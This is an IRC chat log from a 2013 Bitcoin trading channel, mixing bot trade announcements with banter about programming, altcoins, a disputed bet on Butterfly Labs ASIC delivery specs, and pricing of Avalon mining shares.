lippoper1: DiabloMiner probably hasnt even paid for itself Apr 29 21:36:01 [BTCTC] [ASICMINER-PT] 1 @ 1.278 BTC [+] Apr 29 21:36:02 if you realize that a programmer with my skills could get paid $100+/hr Apr 29 21:36:37 why code when you can IRC all day Apr 29 21:36:44 ThickAsThieves: I dont IRC as much as I used to Apr 29 21:36:53 i dont work as much as I used too Apr 29 21:36:55 :/ Apr 29 21:37:05 Diablo-D3: bullshit Apr 29 21:37:07 PsychoticBoy: its not that I dont work Apr 29 21:37:16 PsychoticBoy: its just I dont like working as a programmer fulltime Apr 29 21:37:22 bosses tend to not understand the art Apr 29 21:37:36 you just diversify your channels on IRC more to make it look like you talk less (but in reality you just talk more in more places) Apr 29 21:37:41 That's why you need to program something you love Apr 29 21:37:49 lippoper1: exactly. Apr 29 21:37:53 like a new Alt Coin with its own proprietary miner Apr 29 21:38:14 well, my alt coin would be cpu only Apr 29 21:38:17 so the miner would be built in Apr 29 21:38:21 ok Apr 29 21:38:28 i'm all for it Apr 29 21:38:44 except FeatherCoin Apr 29 21:38:45 lol Apr 29 21:39:15 hahaha Apr 29 21:39:32 you can't even keep them in a pillowcase without them flying out somehow Apr 29 21:39:45 heh. Apr 29 21:39:48 thats only because of nude women Apr 29 21:39:54 they always want pillow fights Apr 29 21:40:25 [BTCTC] [B.YABMC] 10 @ 0.016 = 0.16 BTC [+] Apr 29 21:40:43 Diablo-D3 http://metro.co.uk/2013/04/27/lingerie-firm-launches-womens-underwear-for-men-3669208/ Apr 29 21:40:43 bosses want like 40 hours per week out of programmers Apr 29 21:40:49 not women's fault Apr 29 21:40:55 mircea_popescu: the fuck? Apr 29 21:40:55 [BTCTC] [ASICMINER-PT] 4 @ 1.285 = 5.14 BTC [+] Apr 29 21:41:01 benkay: which is actually fine Apr 29 21:41:05 but I find an upper limit on my creative productivity at like 32 Apr 29 21:41:05 I program _more_ than 40 hours a week Apr 29 21:41:10 the thing is Apr 29 21:41:20 you probably also spend more time programming than I do Apr 29 21:41:20 dont expect me to be doing anything than thinking about the problem for that. Apr 29 21:41:23 i spend most of my time learning Apr 29 21:41:37 btw, Ive found something rather productive Apr 29 21:41:37 dude Apr 29 21:41:46 macvim does fullscren. Apr 29 21:41:49 let's make an alt coin with some benefits Apr 29 21:41:57 that sounds like a great Diablo programmer task Apr 29 21:42:05 benkay: I subscribe to the perl hubris type of school Apr 29 21:42:15 90% thinking 10% actual coding Apr 29 21:42:29 that's why i'm diving into clojure Apr 29 21:42:31 why code it wrong 4 times when you can code it right once Apr 29 21:42:34 that's my approach to life Apr 29 21:42:39 that's why I barely do anything Apr 29 21:42:51 seriously, if your code has bugs you probably didnt think enough Apr 29 21:43:02 that approach probly works better with coding than with life Apr 29 21:43:03 i'm at a point in my development where i need to fail and iterate rapidly Apr 29 21:43:09 sometimes you just gotta do something Apr 29 21:43:14 in my development development :) Apr 29 21:43:20 like, Ive been trying to make a very fast malloc for single threaded apps Apr 29 21:43:25 I sit there and I think about it for 90% of the time Apr 29 21:43:28 I keep whamming right into KISS hard Apr 29 21:43:36 i'm a fan of iteration and learning by doing Apr 29 21:43:38 did you grow into being able to see the right approach? or were you always a 90% think, 10% crank guy Apr 29 21:43:41 i'm also not a programmer Apr 29 21:43:53 then I just come to the conclusion that with the remaining 10% of the time I will not be able to do it to the best of my ability and move on Apr 29 21:43:54 benkay: I kind have always been that Apr 29 21:44:04 I'll rapidly iterate multiple designs during the 10% though Apr 29 21:44:05 Diablo-D3 how long have you been at it? Apr 29 21:44:10 hrm, awhile Apr 29 21:44:14 Ive been doing C for like 15 years Apr 29 21:44:15 and Im 29 Apr 29 21:44:22 [BTCTC] [ASICMINER-PT] 1 @ 1.28 BTC [-] Apr 29 21:44:29 coming up on mastery, it sounds like Apr 29 21:44:36 wow you're sexy and you're 30 Apr 29 21:44:40 ;-) Apr 29 21:44:43 do you remember much about programming when you were 16? Apr 29 21:44:45 or 17? Apr 29 21:44:54 how was your process different then? Apr 29 21:45:47 lol Apr 29 21:46:47 i was programming qbasic when i was in highschool, and some pascal, it was useful to learn coding concepts, especially since i got into web design after, but coding is much too tedious for me Apr 29 21:47:06 [BTCTC] [ASICMINER-PT] 3 @ 1.285 = 3.855 BTC [+] Apr 29 21:47:13 heh Apr 29 21:47:16 not the kind of brain i have Apr 29 21:47:21 that was directed at Diablo-D3 Apr 29 21:48:23 buuuut, ThickAsThieves, what kind of brain *do* you have? where do you pull the currencies in from? Apr 29 21:48:34 i excel at other things Apr 29 21:49:49 ... Apr 29 21:50:24 surely we dont need to turn this into more of a circle jerk Apr 29 21:51:09 anyone want to mine some PPC? Apr 29 21:52:01 [HAVELOCK] [HIM] 1 @ 1.81 BTC [+] Apr 29 21:53:01 [HAVELOCK] [HIM] 1 @ 1.8490998 BTC [+] Apr 29 21:54:00 [HAVELOCK] [HIM] 5 @ 1.84909999 = 9.2455 BTC [+] Apr 29 21:54:06 anyone mine FTC? Apr 29 21:54:13 anyone in here mining? Apr 29 21:54:13 [02:44:44] do you remember much about programming when you were 16? Apr 29 21:54:22 benkay: I was programming before that, C wasnt my first language Apr 29 21:54:25 its just my favorite Apr 29 21:54:35 I dont remember much of programming back then Apr 29 21:54:58 [02:44:37] wow you're sexy and you're 30 Apr 29 21:54:59 [02:44:42] ;-) Apr 29 21:55:01 [HAVELOCK] [HIM] 2 @ 1.85 = 3.7 BTC [+] Apr 29 21:55:04 I only want to hear those words out of a woman. Apr 29 21:55:23 [MPEX] [S.MPOE] 15000 @ 0.000725 = 10.875 BTC [+] Apr 29 21:56:00 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 29 21:57:01 [HAVELOCK] [HIM] 1 @ 1.86979999 BTC [+] Apr 29 21:57:03 [BTCTC] [ASICMINER-PT] 6 @ 1.285 = 7.71 BTC [+] Apr 29 21:57:30 [BTCTC] [BASIC-MINING] 2 @ 0.428 = 0.856 BTC [+] Apr 29 21:58:54 (2:55:05 PM) Diablo-D3: I only want to hear those words out of a woman. Apr 29 21:59:46 what is this? prison chat? Apr 29 21:59:53 :> Apr 29 22:00:23 damnit, john k is still tallying those bids Apr 29 22:00:40 its ok for you Apr 29 22:00:43 THE SUSPENSE IS… well, not really doing anything for me at all. I get dividends no matter what. Apr 29 22:00:49 8@53 ? Apr 29 22:00:54 I just wanna know if that 53 btc bid went through Apr 29 22:03:04 was it yours? Apr 29 22:03:06 [MPEX] [S.MPOE] 10000 @ 0.000725 = 7.25 BTC [+] Apr 29 22:03:36 no Apr 29 22:08:39 [BTCTC] [ASICMINER-PT] 1 @ 1.285 BTC [+] Apr 29 22:11:01 [HAVELOCK] [HIM] 5 @ 1.9 = 9.5 BTC [+] Apr 29 22:11:03 [HAVELOCK] [HIM] 3 @ 1.9 = 5.7 BTC [+] Apr 29 22:11:04 [HAVELOCK] [HIM] 5 @ 1.9 = 9.5 BTC [+] Apr 29 22:12:02 [HAVELOCK] [HIM] 6 @ 1.94 = 11.64 BTC [+] Apr 29 22:13:00 ;;ticker Apr 29 22:13:00 [HAVELOCK] [HIM] 5 @ 1.95 = 9.75 BTC [+] Apr 29 22:13:01 BTCUSD ticker | Best bid: 142.79999, Best ask: 142.80000, Bid-ask spread: 0.00001, Last trade: 142.81200, 24 hour volume: 70443.15925752, 24 hour low: 131.52300, 24 hour high: 149.08000, 24 hour vwap: 141.37852 Apr 29 22:14:00 [HAVELOCK] [HIM] 10 @ 1.96 = 19.6 BTC [+] Apr 29 22:24:48 [BTCTC] [ASICMINER-PT] 1 @ 1.285 BTC [+] Apr 29 22:26:01 [MPEX] [O.USD.C134T] 3 @ 0.36016613 = 1.0805 BTC [-] Apr 29 22:26:12 [BTCTC] [ASICMINER-PT] 1 @ 1.285 BTC [+] Apr 29 22:26:17 [BTCTC] [ASICMINER-PT] 1 @ 1.305 BTC [+] Apr 29 22:26:27 [BTCTC] [ASICMINER-PT] 4 @ 1.305 = 5.22 BTC [+] Apr 29 22:26:48 [MPEX] [O.USD.P161T] 2 @ 0.6489861 = 1.298 BTC [-] Apr 29 22:28:15 http://casascius.wordpress.com/2013/04/24/i-made-a-video-as-a-reply-to-ron-paul/ Apr 29 22:30:19 mike is a good eater Apr 29 22:33:05 the title should be bitcoin for kindergarden kids Apr 29 22:37:59 https://bitcointalk.org/index.php?topic=189248.msg1960836#msg1960836 Apr 29 22:38:10 results posted Apr 29 22:38:28 AHAHHA Apr 29 22:38:31 IT WENT INTO THE 60S Apr 29 22:38:38 I WIN Apr 29 22:39:19 interesting Apr 29 22:39:21 nerdgasm Apr 29 22:39:24 teek has ordered 10 units Apr 29 22:39:29 while not paying out his debts Apr 29 22:39:33 ;;getrating teek Apr 29 22:39:34 WARNING: Currently not authenticated. User teek, rated since Mon Jul 30 21:46:10 2012. Cumulative rating 4, from 2 total ratings. Received ratings: 2 positive, 0 negative. Sent ratings: 2 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=teek Apr 29 22:42:18 what debts he had ? Apr 29 22:43:00 [MPEX] [S.MPOE] 1250 @ 0.00072584 = 0.9073 BTC [+] Apr 29 22:43:55 [MPEX] [S.DICE] 4250 @ 0.00315598 = 13.4129 BTC [+] Apr 29 22:46:00 [HAVELOCK] [VTX] 2 @ 0.462 = 0.924 BTC [+] Apr 29 22:46:02 [HAVELOCK] [VTX] 3 @ 0.456 = 1.368 BTC [-] Apr 29 22:47:05 https://bitcointalk.org/index.php?topic=188735.msg1978676#msg1978676 Apr 29 22:48:00 [MPEX] [S.MPOE] 3244 @ 0.00073602 = 2.3876 BTC [+] Apr 29 22:50:24 heh Apr 29 22:51:23 aethero isnt a scammer, everyone is just out to get him https://bitcointalk.org/index.php?topic=146611.msg1972605#msg1972605 Apr 29 22:51:33 no bitcoin for me-come back 1 year Apr 29 22:53:19 The reason ZIGGAP is not currently up is because my competition has been selectively scamming me. You see the following organizations are all ran by the same group of organized crime and money launderers: Apr 29 22:53:19 OKPay Apr 29 22:53:19 BitInstant Apr 29 22:53:19 Coinbase Apr 29 22:53:19 Coinabul Apr 29 22:53:19 BTC-E Apr 29 22:53:19 MtGox Apr 29 22:53:31 pretty good. so this is chiefly an issue of meds ? Apr 29 22:54:23 BTCJam too Apr 29 22:54:43 poor molecular, has to repay lost shipments in BTC after 6 months... https://bitcointalk.org/index.php?topic=139787.msg1978669#msg1978669 Apr 29 22:54:58 this makes a nice narrative. dwolla was created just to ach money through bitinstant before coinbase came about, all the while being in cahoots with mtgox and btcjam. Apr 29 22:55:27 like anyone cares about btcjam Apr 29 22:56:13 you know who else is in cahoots with mtgox ? bitme and localbitoins. Apr 29 22:57:01 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 29 22:57:32 whats with localbitcoins Apr 29 22:58:01 [HAVELOCK] [VTX] 2 @ 0.457 = 0.914 BTC [+] Apr 29 22:58:05 [BTCTC] [S.DICE-PT] 30 @ 0.003389 = 0.1017 BTC [+] Apr 29 22:58:09 how is lbtc in bed with gox? Apr 29 22:58:14 [BTCTC] [S.DICE-PT] 20 @ 0.00355 = 0.071 BTC [+] Apr 29 22:59:05 i knew it Apr 29 22:59:28 so to get in the secret bitcoin market cabal one has to sell out half of the company, hmm Apr 29 23:00:01 whatchoo mean, ezdiy? Apr 29 23:00:50 http://www.reddit.com/r/Bitcoin/comments/1crk44/did_anybody_else_just_see_this_posted_and_quickly/ Apr 29 23:10:23 [BTCTC] [B.YABMC] 10 @ 0.016 = 0.16 BTC [+] Apr 29 23:12:01 [HAVELOCK] [SDICE] 1 @ 0.33479999 BTC [+] Apr 29 23:15:01 [HAVELOCK] [SDICE] 2 @ 0.3348 = 0.6696 BTC [+] Apr 29 23:32:18 I need some form of merit badge Apr 29 23:32:36 wgy Apr 29 23:32:37 why Apr 29 23:32:45 I'm the scam whisperer Apr 29 23:33:31 oh? Apr 29 23:35:13 ;;rate dub 1 some form of merit badge Apr 29 23:35:14 Error: For identification purposes, you must be authenticated to use the rating system. Apr 29 23:35:20 blah Apr 29 23:35:23 lol Apr 29 23:45:01 [HAVELOCK] [VTX] 1 @ 0.4601 BTC [+] Apr 29 23:49:31 [BTCTC] [COGNITIVE] 3 @ 0.199 = 0.597 BTC [-] Apr 29 23:50:01 [HAVELOCK] [SDICE] 1 @ 0.32 BTC [-] Apr 29 23:51:00 [HAVELOCK] [VTX] 5 @ 0.4611 = 2.3055 BTC [+] Apr 29 23:56:48 [BTCTC] [BTC-BOND] 235 @ 0.01004 = 2.3594 BTC [+] Apr 30 00:02:09 [MPEX] [S.MPOE] 15050 @ 0.000725 = 10.9113 BTC [-] Apr 30 00:02:53 [BTCTC] [ASICMINER-PT] 1 @ 1.302 BTC [-] Apr 30 00:02:57 [BTCTC] [ASICMINER-PT] 1 @ 1.302 BTC [-] Apr 30 00:03:03 [BTCTC] [ASICMINER-PT] 17 @ 1.305 = 22.185 BTC [+] Apr 30 00:04:38 http://bitbet.us/bet/337/bfl-will-deliver-asic-devices-before-may-1st/ should be resolved as first miners have already been delivered and they are within +-10% of advertised specs (5.5 GH/s (+- 10% running variance)) Apr 30 00:06:24 if so, then the July one is also resolved Apr 30 00:13:45 [BTCTC] [S.DICE-PT] 98 @ 0.00338 = 0.3312 BTC [-] Apr 30 00:19:16 ThickAsThieves: agreed Apr 30 00:19:23 both should be resolved Apr 30 00:20:01 I only have a small vote on the May one :) Apr 30 00:20:22 very risky bet, but seems like it paid off Apr 30 00:23:53 it will be debated surely Apr 30 00:24:04 not sure which side I would lean toward Apr 30 00:24:24 they do appear to have shipped more than just testing units Apr 30 00:24:43 they use more power than originally anticipated Apr 30 00:24:53 but the bet says "advertised specs" Apr 30 00:24:59 [BTCTC] [ASICMINER-PT] 10 @ 1.3045 = 13.045 BTC [-] Apr 30 00:25:04 [BTCTC] [ASICMINER-PT] 1 @ 1.3049 BTC [+] Apr 30 00:25:05 you know in retrospect... that aethero post Apr 30 00:25:09 [BTCTC] [ASICMINER-PT] 9 @ 1.305 = 11.745 BTC [+] Apr 30 00:25:10 and does not limit when those specs can be advertised Apr 30 00:25:15 i'm not even sure what's the take away. the dazzling display of paranoia Apr 30 00:25:20 [BTCTC] [ASICMINER-PT] 1 @ 1.3075 BTC [+] Apr 30 00:25:29 [BTCTC] [ASICMINER-PT] 2 @ 1.3099 = 2.6198 BTC [+] Apr 30 00:25:30 it was probly just a diversion Apr 30 00:25:31 it's really thick on that post. somebody is using too many drugs. Apr 30 00:25:33 [BTCTC] [ASICMINER-PT] 10 @ 1.30997 = 13.0997 BTC [+] Apr 30 00:25:35 or the fact that bitcoin "businesses" and "infrastructure" are so shitty someone could end up with the impression he's being targetted Apr 30 00:25:43 whereas they just naturally fail to work Apr 30 00:25:45 [BTCTC] [ASICMINER-PT] 10 @ 1.30998 = 13.0998 BTC [+] Apr 30 00:25:49 [BTCTC] [ASICMINER-PT] 3 @ 1.312499 = 3.9375 BTC [+] Apr 30 00:25:53 [BTCTC] [ASICMINER-PT] 30 @ 1.3199 = 39.597 BTC [+] Apr 30 00:25:57 [BTCTC] [ASICMINER-PT] 3 @ 1.32 = 3.96 BTC [+] Apr 30 00:26:02 [BTCTC] [ASICMINER-PT] 1 @ 1.32 BTC [+] Apr 30 00:26:21 an unhealthy dose of paranoia and a shitty infrastructure = ranting and raving. Apr 30 00:26:40 [BTCTC] [ASICMINER-PT] 1 @ 1.32475 BTC [+] Apr 30 00:28:34 [BTCTC] [GSDPT] 36 @ 0.00328 = 0.1181 BTC [+] Apr 30 00:28:56 hey dumbasses Apr 30 00:29:00 how are you all doing tonight Apr 30 00:29:20 fine till you arrived Apr 30 00:30:41 [BTCTC] [COGNITIVE] 2 @ 0.199 = 0.398 BTC [-] Apr 30 00:34:35 it's "Dumas" Apr 30 00:35:56 mircea_popescu: I got a distinctly manic response from him when I asked his wife about the legality of her internet bakery Apr 30 00:37:21 ThickAsThieves: the product page has never mentioned any wattage, just GH/s. I pre-ordered products twice and never saw wattage mentioned anywhere, so if you ask me the No voters are just coming up with excuses. Apr 30 00:38:36 mircea_popescu: this was 6 months or so back, I assumed there was a train wreck coming at that point Apr 30 00:39:01 [HAVELOCK] [HIM] 14 @ 1.9011 = 26.6154 BTC [-] Apr 30 00:40:45 rikur, I could swear that there used to be power specs on the page, also that the advertised GHs used to be higher for some products Apr 30 00:41:16 however even if so, what's advertised now, is still techincally meeting the terms of the bet text Apr 30 00:41:45 as it does not specify which specs advertised would be used Apr 30 00:41:47 i think it was said a thousand times that a. specs are hash and power and b. the specs at the time of the bet count Apr 30 00:42:04 its not said in the bet Apr 30 00:42:21 it is, inasmuch as it doesn't say otherwise. Apr 30 00:43:17 does that mean if specs were changed in the advertisment before the newer bets, that those specs will be referred to? Apr 30 00:43:36 !t m S.MPOE Apr 30 00:43:36 they were advertising 1gh/w Apr 30 00:43:37 [MPEX:S.MPOE] 1D: 0.00067147 / 0.00070786 / 0.00073602 (795906 shares, 563.40 BTC), 7D: 0.00064 / 0.00069667 / 0.00073762 (2506507 shares, 1,746.23 BTC), 30D: 0.00059218 / 0.00069187 / 0.00073891 (10333478 shares, 7,149.47 BTC) Apr 30 00:43:38 big time Apr 30 00:43:41 you cant go around that Apr 30 00:43:49 ThickAsThieves which do you mean ? Apr 30 00:44:00 not sure when they changed teh advertised specs Apr 30 00:44:01 they, since last year- have advertised 1gh/w Apr 30 00:44:06 but if a bet was made after that Apr 30 00:44:10 only recent changed Apr 30 00:44:11 then should not those specs be used Apr 30 00:44:20 made = created Apr 30 00:44:29 ThickAsThieves: you can check the internet archive for the webby around the time the bet was made, no difference at all IIRC Apr 30 00:44:32 well, since now bfl is not only a scammy piece of shit on all the other counts, Apr 30 00:44:35 and how do we determine what date the specs advertised were changed Apr 30 00:44:39 but also on the count of altering specs Apr 30 00:44:48 i would guess only bets clearly specifying it would be allowed. Apr 30 00:44:54 I do not have a bet at all Apr 30 00:44:55 at the time these bets were allowed bfl hadn Apr 30 00:45:01 [HAVELOCK] [SDICE] 2 @ 0.32000001 = 0.64 BTC [+] Apr 30 00:45:01 't pulled this particular dirty trick yet. Apr 30 00:45:02 [HAVELOCK] [SDICE] 18 @ 0.32 = 5.76 BTC [-] Apr 30 00:45:22 but to me it would be clear that the specs are failed for the bet Apr 30 00:45:26 rikur you are wrong Apr 30 00:45:32 i'm pretty sure specs changed Apr 30 00:45:41 the Jala is much faster than specd and uses much more power Apr 30 00:45:42 ThickAsThieves: just check the internet archive Apr 30 00:45:44 fascinating what people are willing to say for a dime thi. Apr 30 00:45:47 no thanks Apr 30 00:45:52 rikur you are lieing and you know it, stop already. Apr 30 00:46:00 wayback machine sux Apr 30 00:46:15 its only marginally useful Apr 30 00:46:22 particularly on dynamic pages Apr 30 00:46:48 http://i.imgur.com/pXyy3.pngand Apr 30 00:46:48 http://i.imgur.com/5MBoA.png Apr 30 00:47:14 ThickAsThieves: you apparently don't know how the wayback machine works Apr 30 00:47:33 more that i dont care Apr 30 00:47:44 but sure Apr 30 00:47:53 you got me Apr 30 00:48:23 mircea_popescu: sorry but no I Apr 30 00:48:25 m not :) Apr 30 00:48:40 quite clearly stated on their own forum. release specs : jalapeno 4.5 at 4.5 ; single 60 at 60 mini 1500 at 1500 Apr 30 00:48:42 rikur did you look at those images mp just linked? Apr 30 00:48:51 it's in the screenshot and ffs everyone knows it already. Apr 30 00:48:53 also says _FINAL_ spec Apr 30 00:48:58 But I hope whoever resolves it really goes through the arguments and doesn't just pick one on a whim Apr 30 00:49:16 i do think them changing the specs advertised is sneaky Apr 30 00:49:24 and would find it amusing if that turned the bet Apr 30 00:49:37 ThickAsThieves ya, well, bitbet isn't betsofbitcoin Apr 30 00:50:02 it also is running at 5.8 gh on average - so it fails at 5gh bet also Apr 30 00:50:03 also, rikur, it is not in your best interest to rush bet resolution Apr 30 00:50:10 just in case BFL fixes the specs Apr 30 00:50:21 and meets original claims Apr 30 00:50:28 more obviously Apr 30 00:50:54 ThickAsThieves: those posts are from last year, when the bet was created the product page only advertised GH/s. Apr 30 00:51:02 what are they doing anyway, 28 gh/s at 150w or ? Apr 30 00:51:03 prove it Apr 30 00:51:33 Jalapeno is doin 5.8 and approx 30w Apr 30 00:51:41 rikur so you would have been ok with a box of gpus? Apr 30 00:51:54 also, its likely that the forum posts stille xist Apr 30 00:52:01 or are quoted Apr 30 00:52:19 is a forum post an advertisement? Apr 30 00:52:36 http://i.imgur.com/pXyy3.png Apr 30 00:52:41 this is. Apr 30 00:52:50 it does say "announcem,ent" Apr 30 00:53:01 ... Apr 30 00:53:10 but not advertisement :) Apr 30 00:53:12 http://web.archive.org/web/20130404210143/https://products.butterflylabs.com/homepage/5-gh-s-bitcoin-miner.html Apr 30 00:53:22 ofc is advertisment Apr 30 00:53:24 its their forum Apr 30 00:53:48 why does someone care about the 4 april 2013 snapshot ? Apr 30 00:53:49 That's the oldest Jalopeno page on wayback machine, it's after the bet but hey, it's better than nothing. Do you have a product page that has wattage mentioned anywhere? Didn't think so :p Apr 30 00:53:54 ahahaha Apr 30 00:54:00 so wait wait. Apr 30 00:54:01 it Apr 30 00:54:06 's after the bet but hey ? Apr 30 00:54:29 ^ Apr 30 00:54:36 Y and 11 others followed you Apr 30 00:54:39 dude i'm hot stuff. Apr 30 00:54:40 well you can see the jalapeno went from 1 usb cable Apr 30 00:54:42 to 2 usb cables Apr 30 00:54:45 mircea_popescu: please show me a single product page link that has wattage mentioned, from any date. If you don't have one, I think the April 4th link is valuable :) Apr 30 00:54:49 to usb cable and a brick Apr 30 00:55:02 kakobrekla: has nothing to do with performance though :) Apr 30 00:55:02 mircea_popescu, it is running at 5.8 -from very reliable sources - so the bet is a fail Apr 30 00:55:08 so you think the link is valuable, good for you. Apr 30 00:55:08 it has Apr 30 00:55:14 peformance is gh/s/w Apr 30 00:55:41 jborkl: wrong, the advertised performance was with +-10% variance and the bet said that it has to be +-10% of that Apr 30 00:55:52 also, it should not crap out in two weeks time.. Apr 30 00:56:08 jborkl tbh, the +- there is to be construed in their favour. at least this hash, no more than this wattage sort of thing. Apr 30 00:56:09 accually Apr 30 00:56:10 that will be interesting... which bfl catches fire first? Apr 30 00:56:13 the case was not in the 10% Apr 30 00:56:16 i don't think they'd count as failed for overdelivering Apr 30 00:56:19 case is much bigger Apr 30 00:56:36 peformance is also density Apr 30 00:56:37 kakobrekla: size of a unit has nothing to do with performance, don't be silly Apr 30 00:56:43 sure Apr 30 00:56:52 oh, I would have rear the bet +- of 5gh or w\e Apr 30 00:56:54 read Apr 30 00:57:11 your boatload of bfl jalapeno has arrived : http://www.imageblog.co.nz/images/20111018014140_failboatrena.jpg Apr 30 00:57:19 rikur they failed on so many levels you can just pick one favourite Apr 30 00:57:28 ta-da https://forums.butterflylabs.com/content/117-announcement-bfl-asic-release-specifications.html Apr 30 00:58:07 well, it was supposed to warm coffee also, it failed there also Apr 30 00:58:15 yep. Apr 30 00:58:21 ThickAsThieves rikur still thinks the web archive is valuable. Apr 30 00:58:42 "Power figures are +/- 10% of those listed while we finish optimizing our power subsystem." << that's where the 10% came from im pretty sure. Apr 30 00:58:49 rikur, what say you: https://forums.butterflylabs.com/content/117-announcement-bfl-asic-release-specifications.html Apr 30 00:58:54 as in, whoever put the bets in trying to match whatever bfl was claiming at the time Apr 30 01:00:10 ThickAsThieves: that's not an an advertisement. Forum moderators claims/behaviour can't be used against a company in court. Apr 30 01:00:28 It's not just in case of BFL, but for any forum posts Apr 30 01:00:30 what does court have to do with it Apr 30 01:00:47 ThickAsThieves: they're the ones that eventually solve conflicts Apr 30 01:01:01 [HAVELOCK] [VTX] 10 @ 0.4749 = 4.749 BTC [+] Apr 30 01:01:01 the account is called BFL_office ;'/ Apr 30 01:01:09 I might sue bitbet.us over this for sure :) Apr 30 01:01:18 bwahaha Apr 30 01:01:36 ad·ver·tise·ment [ad-ver-tahyz-muhnt, ad-vur-tis-muhnt, -tiz-] noun Apr 30 01:01:36 1. a paid announcement, as of goods for sale, in newspapers or magazines, on radio or television, etc. Apr 30 01:01:36 2. a public notice, especially in print. Apr 30 01:01:36 3. the action of making generally known; a calling to the attention of the public Apr 30 01:01:49 mircea_popescu: it only costs <300$ and I would win more bitcoins in this case, so it would be worth a shot Apr 30 01:02:26 rikur http://www.duhaime.org/LegalDictionary/O/OrganizedPseudolegalCommercialArgumentLitigant.aspx Apr 30 01:02:30 that's the term of art. Apr 30 01:03:10 mircea_popescu: thanks, but I know my rights well enough Apr 30 01:03:31 the problem would seem to be you imagine much more than you know. Apr 30 01:03:37 sure Apr 30 01:03:54 rikur, your only argument is that the bet does not state what date of advertisement would be used, and you already see where mp lies on that Apr 30 01:04:30 ThickAsThieves: nope, my argument is that the product page has never advertised wattage and I know this since I've ordered from them twice. Apr 30 01:04:38 [MPEX] [S.DICE] 3 @ 0.00343999 = 0.0103 BTC [+] Apr 30 01:04:45 your anecdotal experience is not a factor Apr 30 01:04:52 thus wayback machine Apr 30 01:05:01 where you ordered it from and what you have read has nothing to do with what they stated Apr 30 01:05:04 it's not just up to MP tho, he has a crew that decided the resolution Apr 30 01:05:09 so cross your fingers Apr 30 01:05:17 or tamper the jury pool Apr 30 01:05:20 or stop Apr 30 01:05:46 [BTCTC] [MININGCO.ETF] 2 @ 0.679 = 1.358 BTC [+] Apr 30 01:05:55 no like I said I just hope that they realy look into the arguments properly and take their time to resolve it in a fair way Apr 30 01:06:00 [HAVELOCK] [VTX] 18 @ 0.4571 = 8.2278 BTC [-] Apr 30 01:06:04 they will Apr 30 01:06:04 or sue, obviously Apr 30 01:06:12 betty sue Apr 30 01:06:21 peggy sue Apr 30 01:06:38 a boy named sue Apr 30 01:08:04 btw, i just revived https://bitcointalk.org/index.php?topic=119338.msg1979975#msg1979975 Apr 30 01:08:32 [BTCTC] [BASIC-MINING] 2 @ 0.428 = 0.856 BTC [+] Apr 30 01:16:06 <+AssetBot> [Cado.AvalonB3] 1 @ 0.05000000 = 0.05000000 [+] Apr 30 01:16:17 and you thought people were overpaying for blades Apr 30 01:16:44 that is 1/11000 of an Avalon Apr 30 01:16:49 i have no idea what that is. Apr 30 01:17:06 it's an asset on BitFunder Apr 30 01:17:21 guy is breaking up 3 Avalons on order into 33000 shares Apr 30 01:18:10 hey hey i got proprietary rights on that syntax Apr 30 01:18:29 scam. Apr 30 01:18:37 talk to Jezz Apr 30 01:18:41 Jezzz? Apr 30 01:18:53 i dunno, i think thats the guy who runs the BF bot Apr 30 01:19:27 say no more! Apr 30 01:19:59 ;;calc 33000 * 0.05 Apr 30 01:20:00 1650 Apr 30 01:20:04 bwahahaha what ? Apr 30 01:20:08 lol Apr 30 01:20:16 eh get out. Apr 30 01:20:22 sales started at .03 tho Apr 30 01:20:25 so not AS bad Apr 30 01:20:28 but still Apr 30 01:20:28 two hundred grand for three avalons ? what is this, sparta ? Apr 30 01:20:30 horrible Apr 30 01:20:54 what are avalons anyway, 60 gh ? Apr 30 01:21:03 88 Apr 30 01:21:16 shit i'm so stupid, I shouldve boght AM blades amd then IPO'd at 10x Apr 30 01:21:19 derp Apr 30 01:21:48 yeah douches do that. Apr 30 01:22:06 or maybe is just peoples maff Apr 30 01:22:11 not sure on this one Apr 30 01:22:35 so wait. Apr 30 01:22:43 ;;calc 88 * 3 / 1650 Apr 30 01:22:44 0.16 Apr 30 01:22:50 i think this is also evidence that a split share AM asset would do well Apr 30 01:23:00 [HAVELOCK] [VTX] 12 @ 0.4729 = 5.6748 BTC [+] Apr 30 01:23:08 srsly ? 0.16 gh/btc ? Apr 30 01:23:17 no joke Apr 30 01:23:25 ;;calc 1650 * 142 / 88 / 3 Apr 30 01:23:26 887.5 Apr 30 01:23:27 https://bitfunder.com/asset/Cado.AvalonB3 Apr 30 01:23:35 900 dollah PER GH ?! Apr 30 01:23:40 this is more than gpus wtf. Apr 30 01:23:47 oh you have to pay elec + 1% mgmt fee too Apr 30 01:23:50 ztex fpga roughly Apr 30 01:23:51 not smart investment Apr 30 01:24:10 to say the least Apr 30 01:24:23 ThickAsThieves well i'm not even counting the usual scammy " X % of shares are reserved for management" with sliding X Apr 30 01:24:27 that's par foer the course Apr 30 01:24:54 [MPEX] [S.MPOE] 10350 @ 0.000725 = 7.5038 BTC [-] Apr 30 01:25:02 kakobrekla 80-100 mh/s gpus are about 70-100 bux neh ? Apr 30 01:25:12 less Apr 30 01:25:26 50 bux is 250 mhash or so Apr 30 01:25:28 you can get a 7970 for like 340 Apr 30 01:25:30 $ Apr 30 01:25:51 which does about 680/s on litecoin (more profitable) Apr 30 01:25:54 5770 is 250 at ~50 bux Apr 30 01:26:11 at 110w Apr 30 01:26:17 insanity. Apr 30 01:26:55 ignoranity Apr 30 01:27:17 or you can buy a rack of gpus in a 6u mount from Elemental Technologies Apr 30 01:27:23 stick it someone else's data center Apr 30 01:27:45 their bread and butter is on-demand transcoding, so they may know what's up w/r/t box design Apr 30 01:28:24 i'm about 1/10th of the way into talking my way into free development boxes from them Apr 30 01:28:30 which i will ship to iceland Apr 30 01:28:37 and generate bitcoins from geothermal power Apr 30 01:28:43 or litecoins w/e Apr 30 01:28:59 https://bitcointalk.org/index.php?topic=75883.msg1978571#msg1978571 Apr 30 01:29:04 doesn't this look more like a snowdick ? Apr 30 01:29:45 wee bit lumpy Apr 30 01:30:09 my sample size for comparison isn't statistically valid tho Apr 30 01:30:24 "Mircea Popescu once again demonstrates his utterly superior intellect: http://trilema.com/2013/the-future-of-bitcoin-regulation/ < Deep insight, prescience. Relentless logic." Apr 30 01:30:28 ok, which one of you is this ? Apr 30 01:31:46 not me, but I do love the word prescience Apr 30 01:31:47 Not I, but good post man! Apr 30 01:32:18 this is a fine example of why you shouldn't take twitter seriously. Apr 30 01:32:29 250mh from 5770? Apr 30 01:32:29 also i hope nassim taleb 